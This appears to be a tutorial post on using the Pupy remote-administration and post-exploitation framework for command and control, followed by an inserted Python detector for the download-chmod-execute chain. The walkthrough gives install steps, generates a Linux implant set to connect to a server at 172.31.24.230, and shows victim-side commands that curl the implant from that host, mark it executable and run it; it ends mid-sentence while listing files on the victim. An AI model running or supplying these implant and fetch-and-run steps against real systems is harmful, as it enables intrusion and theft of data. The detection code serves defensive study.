[Offensive Security] Command and Control with Pupy!!
--
What is Pupy?
Pupy is an open-source remote administration and post-exploitation tool written in Python. Pupy executes in memory, which leaves a low footprint. Pupy also offers multiple communication channel options for its traffic.
MITRE ATT&CK
- initial access
- execution
- persistence
- privilege escalation
- defense evasion
- credential access
- discovery
- lateral movement
- collection
- command & control
- exfiltration
- impact
DEMO
Installation
To install Pupy, execute the following commands one by one:
git clone https://github.com/n1nj4sec/pupy
Now install all the requirements using pip:
cd pupy
pip install -r requirements.txt
Now run Pupy using the following command:
./pupysh.py
Establish a new session
Pupy Server: Main Terminal
config list
- This command shows all configurations, including the [listeners].
listen -a rsa
gen --output output/linux.ln --output-dir /project --debug -f client -O linux -A x64 connect --host 172.31.24.230:9091 -t rsa
Victim — Linux
curl --output $HOME/linux.ln http://172.31.24.230:8080/linux.ln
chmod +x $HOME/linux.ln
./linux.ln
After 60 seconds, the implant should connect to the Pupy server.
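On the defender's side, the download, chmod and execute sequence shown above is a chain that process-execution logs can surface. The following Python is an added example, not part of the original post or of Pupy: the log format, hostnames and usernames are constructed, and it assumes the sensor records the absolute path of executed files.

```python
import shlex
from datetime import datetime, timedelta

# Constructed sample events: "<ISO time> <host> <user> <command line>".
# Assumption: the sensor logs the resolved absolute path of executed files.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 web01 alice curl --output /home/alice/linux.ln http://172.31.24.230:8080/linux.ln
2024-05-01T10:00:05 web01 alice chmod +x /home/alice/linux.ln
2024-05-01T10:00:09 web01 alice /home/alice/linux.ln
2024-05-01T10:02:00 web01 bob curl --output /home/bob/report.pdf http://intranet.example/report.pdf
2024-05-01T10:03:00 web02 carol chmod +x /home/carol/deploy.sh
2024-05-01T10:03:02 web02 carol /home/carol/deploy.sh
"""
DOWNLOAD_FLAGS = {"curl": ("-o", "--output"), "wget": ("-O", "--output-document")}

def download_target(argv):
    """Return the file a curl/wget command writes to, or None."""
    flags = DOWNLOAD_FLAGS.get(argv[0].rsplit("/", 1)[-1], ())
    return next((argv[i + 1] for i in range(1, len(argv) - 1) if argv[i] in flags), None)

def chmod_exec_targets(argv):
    """Return the files a chmod command marks executable (symbolic or octal mode)."""
    if argv[0].rsplit("/", 1)[-1] != "chmod" or len(argv) < 3:
        return []
    mode = argv[1]
    symbolic = "+" in mode and "x" in mode.split("+", 1)[1]
    octal = mode.isdigit() and any(int(d) & 1 for d in mode)
    return argv[2:] if symbolic or octal else []

def detect(log_text, window=timedelta(minutes=5)):
    """Alert when one user downloads, chmods and runs the same file within `window`."""
    state, alerts = {}, []  # (host, user, path) -> [stage, download time]
    for line in filter(str.strip, log_text.splitlines()):
        ts, host, user, cmd = line.split(" ", 3)
        when, argv = datetime.fromisoformat(ts), shlex.split(cmd)
        if (path := download_target(argv)):
            state[(host, user, path)] = ["downloaded", when]
            continue
        for p in chmod_exec_targets(argv):
            entry = state.get((host, user, p))
            if entry and when - entry[1] <= window:
                entry[0] = "executable"
        entry = state.get((host, user, argv[0]))
        if entry and entry[0] == "executable" and when - entry[1] <= window:
            alerts.append((host, user, argv[0], ts))
            del state[(host, user, argv[0])]
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Only the first three events form the full chain; a download alone (bob) or a chmod and run of a file that was never downloaded (carol) does not alert.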
Pupy Server: Main Terminal
ls
- Notice the password.txt within the…